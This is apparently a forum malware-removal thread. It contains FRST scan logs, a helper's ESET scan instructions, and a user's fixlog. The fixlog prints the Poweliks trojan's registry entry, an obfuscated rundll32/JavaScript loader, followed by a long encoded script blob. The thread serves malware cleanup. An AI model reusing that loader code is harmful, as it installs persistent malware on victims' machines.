CHR HKLM\...\Chrome\Extension: [fnjbmmemklcjgepojigaapkoodmkgbae] - C:\Program Files\DivX\DivX Plus Web Player\google_chrome\wpa\wpa.crx [2011-02-07]
CHR HKLM\...\Chrome\Extension: [jmfkcklnlgedgbglfkkgedjfmejoahla] - C:\Program Files\AVG\AVG2012\Chrome\safesearch.crx [2012-07-26]
CHR HKLM\...\Chrome\Extension: [knkakpihealnpggeceajhaonlmgdkaip] - C:\Users\MIKEAN~1\AppData\Local\Temp\tbch.crx [2012-07-26]
CHR HKLM\...\Chrome\Extension: [mpieaakhacmfleokhjcjnpcnmnmpfkid] - C:\Program Files\fbphotozoom\fbphotozoom16.crx [2012-04-05]
CHR HKLM\...\Chrome\Extension: [ndibdjnfmopecpmkdieinmbadjfpblof] - C:\Program Files\AVG\AVG2012\Chrome\donottrack.crx [2012-04-20]
CHR HKLM\...\Chrome\Extension: [nneajnkjbffgblleaoojgaacokifdkhm] - C:\Program Files\DivX\DivX Plus Web Player\google_chrome\html5video\html5video.crx [2011-02-07]

========================== Services (Whitelisted) =================

R2 AVGIDSAgent; C:\Program Files\AVG\AVG2012\AVGIDSAgent.exe [5175856 2013-10-16] (AVG Technologies CZ, s.r.o.)
R2 avgwd; C:\Program Files\AVG\AVG2012\avgwdsvc.exe [193288 2012-02-14] (AVG Technologies CZ, s.r.o.)
S4 GameConsoleService; C:\Program Files\eMachines Games\eMachines Game Console\GameConsoleService.exe [165416 2008-05-05] (WildTangent, Inc.)
S3 IDriverT; C:\Program Files\Common Files\InstallShield\Driver\11\Intel 32\IDriverT.exe [69632 2005-04-04] (Macrovision Corporation) [File not signed]
R2 MsMpSvc; C:\Program Files\Microsoft Security Client\Antimalware\MsMpEng.exe [11736 2011-04-27] (Microsoft Corporation)
R3 NisSrv; C:\Program Files\Microsoft Security Client\Antimalware\NisSrv.exe [208944 2011-04-27] (Microsoft Corporation)

==================== Drivers (Whitelisted) ====================

R3 AVGIDSDriver; C:\Windows\System32\DRIVERS\avgidsdriverx.sys [142176 2012-12-10] (AVG Technologies CZ, s.r.o. )
R3 AVGIDSFilter; C:\Windows\System32\DRIVERS\avgidsfilterx.sys [24144 2011-12-23] (AVG Technologies CZ, s.r.o. )
R0 AVGIDSHX; C:\Windows\System32\DRIVERS\avgidshx.sys [24896 2012-04-19] (AVG Technologies CZ, s.r.o. )
R3 AVGIDSShim; C:\Windows\System32\DRIVERS\avgidsshimx.sys [17232 2011-12-23] (AVG Technologies CZ, s.r.o. )
R1 Avgldx86; C:\Windows\System32\DRIVERS\avgldx86.sys [250080 2012-11-08] (AVG Technologies CZ, s.r.o.)
R1 Avgmfx86; C:\Windows\System32\DRIVERS\avgmfx86.sys [41040 2011-12-23] (AVG Technologies CZ, s.r.o.)
R0 Avgrkx86; C:\Windows\System32\DRIVERS\avgrkx86.sys [31952 2012-01-31] (AVG Technologies CZ, s.r.o.)
R1 Avgtdix; C:\Windows\System32\DRIVERS\avgtdix.sys [302368 2013-04-11] (AVG Technologies CZ, s.r.o.)
S3 BVRPMPR5; C:\Windows\system32\drivers\BVRPMPR5.SYS [49904 2010-11-03] (Avanquest Software) [File not signed]
R0 gfibto; C:\Windows\System32\drivers\gfibto.sys [13560 2012-12-02] (GFI Software)
R1 MpFilter; C:\Windows\System32\DRIVERS\MpFilter.sys [165648 2011-04-18] (Microsoft Corporation)
R3 MpNWMon; C:\Windows\System32\DRIVERS\MpNWMon.sys [43392 2011-04-18] (Microsoft Corporation)
S3 V0415Vid; C:\Windows\System32\DRIVERS\V0415Vid.sys [286208 2009-08-03] (Creative Technology Ltd.)
U5 AppMgmt; C:\Windows\system32\svchost.exe [21504 2008-01-20] (Microsoft Corporation)
S3 catchme; \??\C:\Users\MIKEAN~1\AppData\Local\Temp\catchme.sys [X]
S1 CSN5PDTS82; System32\Drivers\CSN5PDTS82.sys [X]
S1 CSN5PDTS82x64; System32\Drivers\CSN5PDTS82x64.sys [X]
S1 dcohjryh; \??\C:\Windows\system32\drivers\dcohjryh.sys [X]
S3 IpInIp; system32\DRIVERS\ipinip.sys [X]
S3 NwlnkFlt; system32\DRIVERS\nwlnkflt.sys [X]
S3 NwlnkFwd; system32\DRIVERS\nwlnkfwd.sys [X]

==================== NetSvcs (Whitelisted) ===================

==================== One Month Created Files and Folders ========

2014-07-20 15:24 - 2014-07-20 15:24 - 00044892 _____ () C:\ComboFix.txt
2014-07-20 14:38 - 2011-06-25 23:45 - 00256000 _____ () C:\Windows\PEV.exe
2014-07-20 14:38 - 2010-11-07 10:20 - 00208896 _____ () C:\Windows\MBR.exe
2014-07-20 14:38 - 2009-04-19 21:56 - 00060416 _____ (NirSoft) C:\Windows\NIRCMD.exe
2014-07-20 14:38 - 2000-08-30 17:00 - 00518144 _____ (SteelWerX) C:\Windows\SWREG.exe
2014-07-20 14:38 - 2000-08-30 17:00 - 00406528 _____ (SteelWerX) C:\Windows\SWSC.exe
2014-07-20 14:38 - 2000-08-30 17:00 - 00098816 _____ () C:\Windows\sed.exe
2014-07-20 14:38 - 2000-08-30 17:00 - 00080412 _____ () C:\Windows\grep.exe
2014-07-20 14:38 - 2000-08-30 17:00 - 00068096 _____ () C:\Windows\zip.exe
2014-07-20 14:25 - 2014-07-20 15:24 - 00000000 ____D () C:\Qoobox
2014-07-20 14:23 - 2014-07-20 15:22 - 00000000 ____D () C:\Windows\erdnt
2014-07-19 19:17 - 2014-07-19 19:17 - 00002341 _____ () C:\Users\MikeandBert\Desktop\Multiple dllhost.exe-Com Surrogate processes running - Virus, Trojan, Spyware, and Malware Removal Logs.url
2014-07-19 15:19 - 2014-07-19 15:19 - 00000000 ____D () C:\Windows\Temp965A39F0-D8D4-45F9-AB4E-7BAA80C34227-Signatures
2014-07-19 14:55 - 2014-07-21 08:07 - 00000000 ____D () C:\FRST
2014-07-19 14:52 - 2014-07-21 08:06 - 00000000 ____D () C:\Users\MikeandBert\Desktop\com fix
2014-07-08 22:44 - 2014-06-06 17:19 - 02051072 _____ (Microsoft Corporation) C:\Windows\system32\win32k.sys
2014-07-08 22:44 - 2014-06-06 17:05 - 12353024 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll
2014-07-08 22:44 - 2014-06-06 16:25 - 09711616 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll
2014-07-08 22:44 - 2014-06-06 16:12 - 01810432 _____ (Microsoft Corporation) C:\Windows\system32\jscript9.dll
2014-07-08 22:44 - 2014-06-06 16:04 - 01106432 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll
2014-07-08 22:44 - 2014-06-06 16:03 - 01427968 _____ (Microsoft Corporation) C:\Windows\system32\inetcpl.cpl
2014-07-08 22:44 - 2014-06-06 16:02 - 01129472 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll
2014-07-08 22:44 - 2014-06-06 16:00 - 00231936 _____ (Microsoft Corporation) C:\Windows\system32\url.dll
2014-07-08 22:44 - 2014-06-06 15:58 - 00065024 _____ (Microsoft Corporation) C:\Windows\system32\jsproxy.dll
2014-07-08 22:44 - 2014-06-06 15:57 - 00142848 _____ (Microsoft Corporation) C:\Windows\system32\ieUnatt.exe
2014-07-08 22:44 - 2014-06-06 15:56 - 00717824 _____ (Microsoft Corporation) C:\Windows\system32\jscript.dll
2014-07-08 22:44 - 2014-06-06 15:56 - 00421376 _____ (Microsoft Corporation) C:\Windows\system32\vbscript.dll
2014-07-08 22:44 - 2014-06-06 15:54 - 00607744 _____ (Microsoft Corporation) C:\Windows\system32\msfeeds.dll
2014-07-08 22:44 - 2014-06-06 15:54 - 00353792 _____ (Microsoft Corporation) C:\Windows\system32\dxtmsft.dll
2014-07-08 22:44 - 2014-06-06 15:54 - 00223232 _____ (Microsoft Corporation) C:\Windows\system32\dxtrans.dll
2014-07-08 22:44 - 2014-06-06 15:54 - 00041472 _____ (Microsoft Corporation) C:\Windows\system32\msfeedsbs.dll
2014-07-08 22:44 - 2014-06-06 15:53 - 01796096 _____ (Microsoft Corporation) C:\Windows\system32\iertutil.dll
2014-07-08 22:44 - 2014-06-06 15:53 - 00073728 _____ (Microsoft Corporation) C:\Windows\system32\mshtmled.dll
2014-07-08 22:44 - 2014-06-06 15:53 - 00010752 _____ (Microsoft Corporation) C:\Windows\system32\msfeedssync.exe
2014-07-08 22:44 - 2014-06-06 15:52 - 02382848 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.tlb
2014-07-08 22:44 - 2014-06-06 15:51 - 00011776 _____ (Microsoft Corporation) C:\Windows\system32\mshta.exe
2014-07-08 22:44 - 2014-06-06 15:47 - 00176640 _____ (Microsoft Corporation) C:\Windows\system32\ieui.dll
2014-07-08 22:44 - 2014-06-06 01:59 - 00506880 _____ (Microsoft Corporation) C:\Windows\system32\qedit.dll
2014-07-08 22:44 - 2014-05-29 23:53 - 00273408 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\afd.sys
2014-06-25 10:59 - 2014-06-25 10:59 - 00000000 ____D () C:\Users\MikeandBert\AppData\Local\Adobe

==================== One Month Modified Files and Folders =======

2014-07-21 08:07 - 2014-07-19 14:55 - 00000000 ____D () C:\FRST
2014-07-21 08:06 - 2014-07-19 14:52 - 00000000 ____D () C:\Users\MikeandBert\Desktop\com fix
2014-07-21 08:04 - 2011-11-16 02:59 - 00000892 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job
2014-07-21 08:01 - 2006-10-11 00:09 - 01826923 _____ () C:\Windows\WindowsUpdate.log
2014-07-21 07:57 - 2013-04-18 22:02 - 00065536 _____ () C:\Windows\system32\Ikeext.etl
2014-07-21 07:57 - 2008-09-04 17:48 - 00000000 ____D () C:\ProgramData\NVIDIA
2014-07-21 07:57 - 2006-11-02 06:01 - 00000006 ____H () C:\Windows\Tasks\SA.DAT
2014-07-21 07:57 - 2006-11-02 05:47 - 00003216 _____ () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-2P-1.C7483456-A289-439d-8115-601632D005A0
2014-07-21 07:57 - 2006-11-02 05:47 - 00003216 _____ () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-2P-0.C7483456-A289-439d-8115-601632D005A0
2014-07-21 07:57 - 2006-11-02 04:18 - 00000000 ____D () C:\Windows\tracing
2014-07-21 07:54 - 2006-11-02 06:01 - 00032590 _____ () C:\Windows\Tasks\SCHEDLGU.TXT
2014-07-21 07:43 - 2013-10-22 15:08 - 00000830 _____ () C:\Windows\Tasks\Adobe Flash Player Updater.job
2014-07-21 07:28 - 2011-11-16 02:59 - 00000896 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job
2014-07-20 18:32 - 2011-12-03 17:34 - 00000000 ____D () C:\Windows\system32\Drivers\AVG
2014-07-20 15:44 - 2008-01-20 19:47 - 00204214 _____ () C:\Windows\PFRO.log
2014-07-20 15:24 - 2014-07-20 15:24 - 00044892 _____ () C:\ComboFix.txt
2014-07-20 15:24 - 2014-07-20 14:25 - 00000000 ____D () C:\Qoobox
2014-07-20 15:24 - 2006-11-02 04:18 - 00000000 ___RD () C:\Users\Public
2014-07-20 15:24 - 2006-11-02 04:18 - 00000000 ___RD () C:\Users\Default
2014-07-20 15:22 - 2014-07-20 14:23 - 00000000 ____D () C:\Windows\erdnt
2014-07-20 15:21 - 2006-11-02 03:23 - 00000215 _____ () C:\Windows\system.ini
2014-07-20 15:08 - 2010-02-01 11:54 - 00000000 ____D () C:\ProgramData\TEMP
2014-07-19 19:17 - 2014-07-19 19:17 - 00002341 _____ () C:\Users\MikeandBert\Desktop\Multiple dllhost.exe-Com Surrogate processes running - Virus, Trojan, Spyware, and Malware Removal Logs.url
2014-07-19 15:33 - 2011-09-08 03:05 - 00002106 _____ () C:\Windows\epplauncher.mif
2014-07-19 15:19 - 2014-07-19 15:19 - 00000000 ____D () C:\Windows\Temp965A39F0-D8D4-45F9-AB4E-7BAA80C34227-Signatures
2014-07-17 23:53 - 2006-11-02 03:33 - 00762234 _____ () C:\Windows\system32\PerfStringBackup.INI
2014-07-09 03:25 - 2006-11-02 05:47 - 00379856 _____ () C:\Windows\system32\FNTCACHE.DAT
2014-07-09 03:21 - 2006-11-02 05:37 - 00000000 ____D () C:\Program Files\Windows Journal
2014-07-09 03:05 - 2013-08-14 03:14 - 00000000 ____D () C:\Windows\system32\MRT
2014-07-09 03:02 - 2006-11-02 03:24 - 93585272 _____ (Microsoft Corporation) C:\Windows\system32\mrt.exe
2014-07-08 11:28 - 2012-06-14 08:08 - 00699056 _____ (Adobe Systems Incorporated) C:\Windows\system32\FlashPlayerApp.exe
2014-07-08 11:28 - 2011-10-16 04:39 - 00071344 _____ (Adobe Systems Incorporated) C:\Windows\system32\FlashPlayerCPLApp.cpl
2014-07-08 06:20 - 2012-07-07 15:31 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Drive
2014-06-26 13:55 - 2014-05-03 14:30 - 00000000 ____D () C:\Users\MikeandBert\AppData\Roaming\Nikon
2014-06-26 13:55 - 2013-09-17 06:24 - 00000020 ____H () C:\ProgramData\PKP_DLev.DAT
2014-06-26 13:51 - 2013-05-24 19:59 - 00000000 ____D () C:\Users\MikeandBert\Desktop\bert
2014-06-25 10:59 - 2014-06-25 10:59 - 00000000 ____D () C:\Users\MikeandBert\AppData\Local\Adobe
2014-06-23 15:40 - 2009-04-09 11:34 - 00000000 ____D () C:\Users\MikeandBert\Desktop\Mike

Files to move or delete:
====================
C:\ProgramData\hash.dat

==================== Bamital & volsnap Check =================

C:\Windows\explorer.exe => File is digitally signed
C:\Windows\system32\winlogon.exe => File is digitally signed
C:\Windows\system32\wininit.exe => File is digitally signed
C:\Windows\system32\svchost.exe => File is digitally signed
C:\Windows\system32\services.exe => File is digitally signed
C:\Windows\system32\User32.dll => File is digitally signed
C:\Windows\system32\userinit.exe => File is digitally signed
C:\Windows\system32\rpcss.dll => File is digitally signed
C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed

LastRegBack: 2014-07-21 08:10

==================== End Of Log ============================



#8 aharonov

  • Malware Response Team

Posted 22 July 2014 - 01:57 AM

That's great to hear!
Can you please also post up the fixlog that FRST has created? You can find it as fixlog.txt in the same directory as your frst.exe is saved to.

Let's do a check up:


Please download the ESET Online Scanner and save it to your Desktop.
  • Disable the realtime-protection of your antivirus and anti-malware programs because they might interfere with the scan.
  • Start esetsmartinstaller_enu.exe with administrator privileges.
  • Select the option Yes, I accept the Terms of Use and click on Start.
  • Make sure that the option Remove found threats is NOT checked, and the option Scan archives is checked.
  • Now click on Advanced Settings and select the following:
    • Scan for potentially unwanted applications
    • Scan for potentially unsafe applications
    • Enable Anti-Stealth Technology
  • Click on Start. The virus signature database will begin to download. This may take some time.
  • When completed the Online Scan will begin automatically.
    Note: This scan might take a long time! Please be patient.
  • When completed select Uninstall application on close if you so wish, but make sure you copy the logfile first!
  • Now click on Finish
  • A log file is created at C:\Program Files\ESET\EsetOnlineScanner\log.txt.
    Copy and paste the content of this log file in your next reply.
Note: Do not forget to re-enable your antivirus application after running the above scan!

#9 mcgrotty

  • Topic Starter

Posted 23 July 2014 - 04:16 AM

Whoops. I ran it and forgot to post the logs.

Fixlog:

Fix result of Farbar Recovery Tool (FRST written by Farbar) (x86) Version:20-07-2014
Ran by MikeandBert at 2014-07-21 07:51:44 Run:1
Running from C:\Users\MikeandBert\Desktop\com fix
Boot Mode: Normal

==============================================

Content of fixlist:
*****************
REG: reg query "HKU\S-1-5-21-165418536-3136176592-1450045568-1000_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}" /s
HKU\S-1-5-21-165418536-3136176592-1450045568-1000\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml,RunHTMLApplica (the data entry has 289 more characters). <==== Poweliks!
SearchScopes: HKLM - {bbbf3d02-0068-423f-8c68-0fd1c6e50b38} URL = http://search.tb.ask.com/search/GGmain.jhtml?p2=^AW6^xdm003^YYA^us&si=CMS-0uq3jL8CFYpefgodSKIAuQ&ptb=076451AA-4DB5-4C8B-83DA-61CCA08D46B3&ind=2014062122&n=780c262a&psa=&st=sb&searchfor={searchTerms}
SearchScopes: HKCU - {bbbf3d02-0068-423f-8c68-0fd1c6e50b38} URL = http://search.tb.ask.com/search/GGmain.jhtml?p2=^AW6^xdm003^YYA^us&si=CMS-0uq3jL8CFYpefgodSKIAuQ&ptb=076451AA-4DB5-4C8B-83DA-61CCA08D46B3&ind=2014062122&n=780c262a&psa=&st=sb&searchfor={searchTerms}
AlternateDataStreams: C:\ProgramData\TEMP:359B3BDA
AlternateDataStreams: C:\ProgramData\TEMP:430C6D84
AlternateDataStreams: C:\ProgramData\TEMP:9A870F8B
AlternateDataStreams: C:\ProgramData\TEMP:A8ADE5D8
AlternateDataStreams: C:\ProgramData\TEMP:C7DEC6B7
AlternateDataStreams: C:\ProgramData\TEMP:DFC5A2B2
Reboot:

*****************

========= reg query "HKU\S-1-5-21-165418536-3136176592-1450045568-1000_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}" /s =========

HKEY_USERS\S-1-5-21-165418536-3136176592-1450045568-1000_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32
    (Default)    REG_SZ    rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktdsjqu/fodpef?(,)ofx!BdujwfYPckfdu)(XTdsjqu/Tifmm(**/SfhSfbe)(ILDV]]tpguxbsf]]dmbttft]]dmtje]]|bc9:13c5.1:db.5cc7.c89e.b9g6:18:b9e6~]]mpdbmtfswfs43]]b(*,(=0tdsjqu?(*".replace(/./g,function(_){return%20String.fromCharCode(_.charCodeAt()-1);}))
    a    REG_SZ    [encoded script data omitted]
5XHq1KCGjD9r%759aP:4lkd\J"^I#kR*.^93]0sAj#~s]20z":X51H%\tjx-rAITp`s!eb,3q3I7.\zJXR!92tLjPw&}.^-?js3^063thDXnMX9:sBIIV,W\3S-S.IdI^}\tZVp"is~l.j ^ ^.jx[c\o\x]2"*p`s38VIljojqnf~ \!sA+AsAUKw!4Z}3SZ}4}oNI5i1VN!4jj 0hj OxF+9Mt2&X?qIi6G.5e T6P ad\s2&j`wcts\fKZI*p`sK^21cto}2I!5a}jwn1 2n#%wDt2x3?w9e]GIp#iwAnf~ 1y4A1`sA:&gK+GA N2N36`sA: IV53DG}.wA5!]p#f9fJ W*I tf#omc]iwA}9$5jotlGAIjjw$}Asp1_Io]0sAUpHX?j"/}jwM:!Xj#+4?#K1*SZs]6As\ilj#Kw3d ]I+b%61jZArA.$pqm-tZ}3j%.7rjj!}jwp}Ko:P+^YHFz-Sys$CA1I}i5\ts4( q^+b%\g2ZX50s\|y}f#.I3"i}~pj4]]xjH`3BI}ixIJyg rG}(\2H\JzD2is9f5X1!rA}FUsx/j`s/HA9rC:AIjis~.K5aP:wM"V]\ilj#Kw3SyIenb%6^iZh62j$5j0WKjAW\3w9p`s/.Vw##s1."V*I.Kw6#C\*53HI}ix5Jyg 42tf#omc]iwA}(9$5jo5S8Ndy0a5`F%I0*}}0sA5#.~pjw38!1Dk0\\iOriV\*jjjztH,AiP4A#Kw6jse7r:st`ZOp42wiN8s$}:N&9zYVl(9B}jw992t]+Os f"d}V}BC.V1i3xA}j0a9!o\4ZVI"Cx\}V}dA/* s,A"3s~pj0z\2wA53oA}ix(#?R*. N3}0sAj XM#!"+"2}Zj^sA\!w$5qN }b%"#^.j9%3X5!^.6j8p53oAi906eVzXHjVut2NICTwA#:X3d!tj}2tI5jg3+A9XK^9pi^st"ht"jjw/^jw::1K]VxA}.z*.sV3]0sAjTZh62j$5j0WKjA;`Mg/p`s9Kw9piZ61UPsV}3\/8F\s12oA]sz\ts\5?A9i]_NI}iwC}jw$5?1WAF1"jw$.`NG581.}`2\tq}MSywte OvjC[I}iA&[&1.Ko1f]`sAP gMP.~/5jo~5ZsA5jAqwtfjVtKi`sA5i1K53w\F IcI!t1i3xA}jwUp`s$}HYt]p~A}j"+UM]~.H/c"(4$p`I}?0%*e8A/IT}n}XD(e9L" 1AtTwA#.\4KA*PioNI}ix6}.\6jZ0..sH\}w!NZ2.?q6$}`sAUpIV}30aijwYIjafj#~A}8t123" GsS63X?F!0a"jo~?^2\tFI*5qN!.VsFCwAI5ip7}s\Jyw\q2oV]qa6}:XGm`1ue`w?#Vx}#Kx4UVBq?Z6?jx4ilj.#1wjT\`}.U 6Vj2\KPVxj`Vot]94Z]C99K^9p}^sc\o\.83`X5jog5Z}1`2x$p`s.p`s$]At?jos\pjw$}(Thj3oI}iwA}j^d}w9B8VIKi94ij"!5joAl.Vk5jS.}N1]?U%"#s% 5h}HSXR-J "5k1Me+9&ijw3SyI nb,Mi+9&ijw3d ]q+b,M`9fj`s9KVIpnVFn`%jSKK5a]V\M5!X?#TxI#KxGHA!A}`stj!9vijw/(!o p`sxUXV`FVI^}$i`sA5ip7I:jf[FwA5K#5#T&y}:Xr4yw}8b%\Hu56e!9tgj4!jo.t5.w/p`s9KstCCN3\d"V"5jX$nVwA"Z1MeU9&ijw9KstCCN3\J"^IJ&4e9!qwp`sWI!&aps6r48}+8b%\sbHj:Xr8XR\Ik0\J"4^j"/p`suty%&\3wA#Kw4m3X5p0sA`f4 }AI/p`s3[0I35s9"+C9#[y4s5joftTwA}.z*. 
I3}0sAj S6#2^T"V2xmZV.`f^jpZNUpqN$}`s.d"3X.Fz*#xj253oAi906e.z*.0Y3}0sAi906e.z*j3HAp0sAU("!.A5X}jmTiA}3: *Gp3w/#:0DK]q}VwA}jO2|Z9$}`sHut*tj"!5joxH`5\"3xaIZ3aIN.!} sA"fq7Sy^s]x9qmMq.\ &\tM\2KA*Ct2NI}ix6}j9U5jB~p`2\}w\H0Ve5sI]\H,3\ht"5jw$ijwA"Z06[pt*CVjerw.utZss}iwACV^emy^7SH,." Or.U%-Vt%}NIqqP9V1jR-JXR65:1y]3\A}j9UI`s]}`2\\qj9J&4 m!qjp`sx}sw].U%*. I3}0sA"%.bKK4/tx^LUj#A]s9HH!^}lHYBi_19]sa5e9Vq3TWpZ*:5FwHrG}Tm`tB\`.|5V9"5jat8FwA"Z1M !9&ijw3SyI9ijsw\qj9C(9rd H~+b,1`fTaKjA/p`suCqYjt3s~5938!9FdX0\HugCty4]U,];,M#Tw&ijw3:.t\N 1F5 9ip`s34.AfP`sA"V*o.L1*]jwI5jot} jA}jw9?s}h#;,M u9&ijw9:VB^joWXtjgB4s.3|H%-JH,M\os2jjw$iC"DqC2.}jkXi:\Fj`pf 05c#Vwp[MDe9F#~|.9?\K^]IGNCINNd}s,k"3w~pj9U]2wI5jot}+a ijw3SZ}piotI}ix\}!OT5joxH05!`f1-S.s/4Z.KnAsA"+N\1Fj$}wf"C#I}ix\[3`Xp`sutZs}]iwAJ&4 1!qjp`sx}sx$KZW"}H,+JH,35V,}lMj3FXR\}.3\no`cP.j$pjN4PoHc]iwAejat(Fo~I;,Mqjwfj`s9Ksts];/\d"V"ljK"tXO dX1wj%g}JFz-S.}oj;/\JzDri:\j`2\w3\`ZR-.jb*.063}0sAUpHXS!"/}jw9t3eXiuK\Jyw3S.sd}Z*Wti5DJXRX`?0l^st::4}j`s/.G}$P_j\dzYA+2x/ Ma}qM^\[rR\#j\}SZ}4ioNI}ixIJ&4p"jqwp`sWI!w}lAYopZs$}Z*W\ipMSXRX8yjs}joA]V5\]V4$+ws$}^w(#u\2]f"i9!o~p`swV\.K`.$pqV/C 9fthw7p(9$}?Ocj!s1]iwACV^e}H,+JH,.i/O(CMg/tftxm.sZ"2x$p`3aIb,!}s,A5i.wpj\KJy\s}joA]h"\}.w$pqN}J8NWeT&6} Ra\Z1h}.o `ZR-K:VqK^9hnwst5is;p3w/#sIX\!HA}igAJy^4I N(#`Y;#%tcH3x(X07r_WXgCta1AI/p`s!P sqqP9VH3OJXR65V}\6 wM[!4]Kqwt w3&i/R\#jOGjyt5SH,.t:Osl^Ve:N}JH,."sb7H9]H!wA5(4r#3AyP."]1Z*3i:9n\VlDPV9Ht.sl1qwktL~"sw$1AF3t2NH(i*y5Vgfn38KgC4n]owFP.".+`65jot1np9cPF"]9jX`}2.rjMDqKjI#HA,]`sA5is~pjw$}jwA5joA}iwA}jw$p`s$}`sA}iwA}jw$5jo~p`sA5jw$p`s$p`s$}`sA5is~pjw$}jwA5joA}iwA}jw$p`s$}`sA}iwA}jw$5jo~p`sA5jw$p`s$p`s$}`sA5is~pjw$}jwA5joA}iwA}jw$p`s$}`sA}iwA}jw$5jo~p`sA5jw$p`s$p`s$}`sA5is~pjw$}jwA5joA}iwA}jw$p`s$}`sA}iwA}jw$5jo~p`sA5jw$p`s$p`s$}`sA5is~pjw$}jwA5joA}iwA}jw$p`s$}`sA}iwA}jw$5jo~p`sA5jw$p`s$p`s$}`sA5is~pjw$}jwA5joA}iwA#s\Ap`s$]`sA}iwf}jw$5?07rAsA:M9$p`s$p`s$}`sf\Ts~pjw$}jwA5j1qH+On}jX]? 
wP].IA#parj.\V1MB$KoV95yjo.A.fN`I]8yYI5is~pj\/]3wA53qAii^Atjg;I^.f}`sA}iwA}jw$5K]~p`199&g/pyN$p`}U}`sAU#wap9$}jwA5:H&8i^f}jx$p`s$}oNA}iwA}jw$`jo;p`sA5jw9p`s$I0s$]`sA5is~pjw#}jwI5joA}iwA}jl/l`sU}`1A}i"5j:9o5jo p`sA`jw$I`s$p`.$}`sA5is"pjw$ijwA5joA}iwA]jw$p`s$}`sA}iwA}jw$5jogpsVA(C99p`s$p`s$}`sA5is~pjw$}jwA5joA}iwA}jw$p`s$}`sA}iwA}jw$5jo~p`sA5jw$p`s$p`s$}`sA5is~pjw$}jwA5joA}iwA}jw$p`s$}`sA}iwA}jw$5jo~p`sA5jw$p`s$p`s$}`sA5is~pjl}.^xUVoA}iwA}jw$p`s$}`sA}iwA}jw$5jo~p`sA5jw$p`s$p`s$}`sHm"s".D #sjv"joy]T^f}jx$p`s$}qVA}iwA}9$5jo~p`sA5jw$p`s$p`s$}`2!5is~12tqPVjMU3t.\i8*]x9#p`s$]As}tT^A}:9$5joGj`sA5jw$p`s$p`s$}`sA5is~pjO$}jwn5joA}iwA}jw$p`s$}`sA}iwA}jw$5jo~p`sA5jw$p`s$p`s$}`sA5is~pjw$}jwA5joA}iwA}jw$p`s$}`sA}iwA}jw$5jo~p`sA5jw$p`s$p`s$}`sA5is~pjw$}jwA5joA}iwA}jw$p`s$}`sA}iwA}jw$5jo~p`sA5jw$p`s$p`s$}`sA5is~pjw$}jwA5joA}iwA}jw$pqI5jo.1#!DXjx~Hm2o~I;,A"s\"m`NBjH,*#Z.A"3s~Ij^T]jaA`!aAtT5\P.z*.0,/^0s;]Tt6#!8}m3oV}U,t5jg;qt\m0Hzt8s|9qs~p.z*#Vwf` 4ZtTgx]x\/N^t]CAFhH9"siV"V1jODl WFjVj!mZF2K81*}`9AUishjj]}3w25:a3#oj2^!SAoq+ sm*#%4Z}3g"IXOx;,35.~up`s%pqwt Go&9r%7.j\$PK"1}2ot}+9v}jj$jj9o}j9A[Twci!wf5jq\}2}.UMgoo-N8paiwAA5#s~.j] ?OcjL]x]iwn}!j4IAs+HA1L[iXX]V^rtMGSI^92}2joKqw$N21f\_m6U!NI..~GtLj&mx^Fes`![3a#rwA$P`sH]p9A]jx#t(]\l^1Aqjj(.^9"p:Vz\A9A5is~}!XG^!w g?1ZjpgA[.gU+:IB}s}x]ix5C!^"(3oq5`*5jw.I0}F.ys36A929T.~.:XC#Fjj`22rtT"&ijx.rGA/nNspn9wI}!^UC]0lAI&59/5`1Gp`V/}s,15 V~j9p]x4;5jLc]P^q]D9pZ1f}`sACVw6](^9m32;mZ2\}j!NZt#1`tut8.&`#mSj9p82\95(H.CV"vtL9]N`F9iGA2[T^IJ&4#q1HpqW!"L4(}8Vt1GAj[j}qmis5pjw9[yxA:3oAiP9qi3g].j}X}`%c}#T\tFj}.LXK`}hmsafps}VS.NhPs}19TF_p(a }jTy5.4xPfgACMw!Ij.d}jsCV8x6Xh"2o:5U,(UjlUpZ9/m`.!twNI`3}sp.w#H3^!:3B|] wZnC^$p`.j}`snJTx*\y"H5?OGp VAgs~BS.2Xp8t+\A9w}!9Hr(^.]M9&"CH3]f~X#!9A4wwUjZw? 
p4}elB:K]wl`9h\xup`w$4Z3TC8}\1+9_pjaj w;:jqx]Tg|^sgrIAsFCwVtCT^F]2D9Ux$j50NAUx^#j0,K?st]}yNZmi9dp:4Bj!8cjx[5]#xX8swt}8q"tV1W]Ug5nM9t`]V+0.*}M&zKsNClwt$i`FA}#9V}j9O}j8953XWiqa5 :ltKj.HiqI?8#aLHjAA5(H~l0.1"sjB+0N$Is1!nA.v`osoj:ltP.j9j2q/}q^YtfwfIoN/[yF/n!"D 2w]:3H~}qY?tVIA.`FVI01JC_VktV,aN!jA]!xF\ Xyj3lvnMDp+`s$}Z6*]hjH}F94"M#"po1CUsjdl:1oNyw]}^};"ob7?XOJP3\A5kOw8owC3"F.q}]}Z!*^TaZtswCUM[2lb,2U2XapZ.9_1fPZs5:+jW.!^s[ wAj2oy\!9st&aVqtU6As1]TtcCjwsjH~Asyq4!myN2I`F]}sNp\i2l12KX (4IgV3Xj#9V#!jj}`1$n tI}+9}}y99n&H;}Ztx:29sN0}5I }TtZ}x:9.\l2S-jgp\!oL]pg&[2jUlA,!tZN&}P4&H2aq.B}rAV.".A*`Waj89\6AV.:#H7H3j#J 9St2sI]sxA^3j}.js [ZtDi3x:n25-q(LlrAs9(MjqI`t#IVV  VNx"UwUj3"-]MlrU3#2HT"}i3k-?j}#}:}Ajigy[y^ 